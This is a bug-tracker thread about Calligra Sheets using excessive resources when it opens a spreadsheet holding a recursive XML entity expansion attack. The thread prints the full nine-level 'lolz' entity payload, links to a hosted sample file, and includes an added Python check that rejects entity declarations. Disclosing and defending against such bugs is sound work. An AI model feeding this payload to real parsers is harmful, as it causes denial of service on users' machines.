Description of problem:

Version-Release number of selected component (if applicable):
calligra-sheets-2.7.4-1.fc19.x86_64

How reproducible:

Steps to Reproduce:
1. Point browser at http://search.cpan.org/src/DDICK/Spreadsheet-CSV-0.07/t/data/bombs/maindoc.ksp
2. Click OK to open file in Calligra Sheets
3. Watch as Calligra Sheets consumes machine resources processing the external entities inserted in it

Actual results:
Calligra Sheets consumes excessive machine resources

Expected results:
Calligra Sheets should at a minimum refuse to open a file that it detects has defined entities.

Additional info:
Hello,

The above file does seem to crash Calligra Sheets after some time, but can you be more specific about the contents (external entities) of the file that causes this crash?
Hi Ratul,

The above file (like most modern spreadsheet files) is a zip file and can be unpacked with a standard zip utility. The zip archive contains the following entries:

* documentinfo.xml
* maindoc.xml
* mimetype
* preview.png

The maindoc.xml file contains the following entity definitions.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<spreadsheet xmlns="http://www.calligra.org/DTD/tables" syntaxVersion="1" mime="application/x-kspread" editor="Calligra Sheets">

The entity &lol9; is then included in the body of the spreadsheet.

Note there is no external entity definition in this file. This file contains just a standard recursive entity attack as per http://cwe.mitre.org/data/definitions/776.html
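Added example, not part of the original comments and not Calligra code: one way to implement the check the report asks for (refuse a file that defines entities) is to let expat abort at the first entity declaration in any .xml member of the archive, before anything is expanded. The function names, the 16 MiB member cap and the sample documents are assumptions constructed for illustration.

```python
import io
import zipfile
from xml.parsers import expat


class EntityDeclared(Exception):
    """Raised when an XML member declares an entity in its DTD."""


def reject_entities(xml_bytes):
    """Parse with expat and abort at the first <!ENTITY ...> declaration."""
    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise EntityDeclared(name)

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)


def scan_archive(data, max_member_bytes=16 * 1024 * 1024):
    """Return {member: reason} for every .xml member that should block opening."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".xml"):
                continue
            if info.file_size > max_member_bytes:  # assumed cap on declared size
                findings[info.filename] = "member too large"
                continue
            try:
                reject_entities(zf.read(info))
            except EntityDeclared as exc:
                findings[info.filename] = f"declares entity {exc.args[0]!r}"
            except expat.ExpatError as exc:
                findings[info.filename] = f"not well-formed: {exc}"
    return findings


def build_sample(maindoc):
    """Build an in-memory archive laid out like the one described (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/x-kspread")
        zf.writestr("maindoc.xml", maindoc)
    return buf.getvalue()


# Constructed samples: a two-level chain (reduced from the nine levels quoted) and a clean document.
NESTED = b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;">]><spreadsheet>&lol2;</spreadsheet>'
CLEAN = b'<?xml version="1.0"?><spreadsheet><cell>1</cell></spreadsheet>'
```

The scan stops at the first declaration, so its cost does not grow with the nesting depth of the entities.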
The document opens for me on f19, but it does take about ~40 seconds on my decently-powered (dell optiplex 7010) box
I take it you have more than 300Mb (3 * (10 ^ 8)) of RAM then. I wasn't trying to nuke people's machines, I was just providing a proof of concept.
Making this public, as upstream bug is public.
This bug appears to have been reported against 'rawhide' during the Fedora 22 development cycle. Changing version to '22'. More information and reason for this action is here: https://fedoraproject.org/wiki/Fedora_Program_Management/HouseKeeping/Fedora22
Let's continue to track this upstream (currently have no plans to fix this fedora-only)